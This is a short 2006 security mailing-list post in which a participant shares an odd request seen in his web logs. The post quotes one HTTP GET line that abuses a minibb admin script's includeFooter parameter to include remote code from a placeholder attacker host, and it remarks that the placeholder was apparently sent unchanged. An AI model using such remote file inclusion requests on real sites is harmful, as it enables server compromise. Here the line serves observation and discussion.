funsec mailing list archives

Re: interesting attack


From: Peter Kosinar <goober () nuf ksp sk>
Date: Fri, 14 Apr 2006 18:07:29 +0200 (CEST)

Speaking of interesting attacks, here's one I see occasionally and it always keeps me wondering what is the attacker trying to achieve :-)

GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1

Note that this request has NOT been sanitized/obfuscated in ANY way...

Peter
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.


Current thread: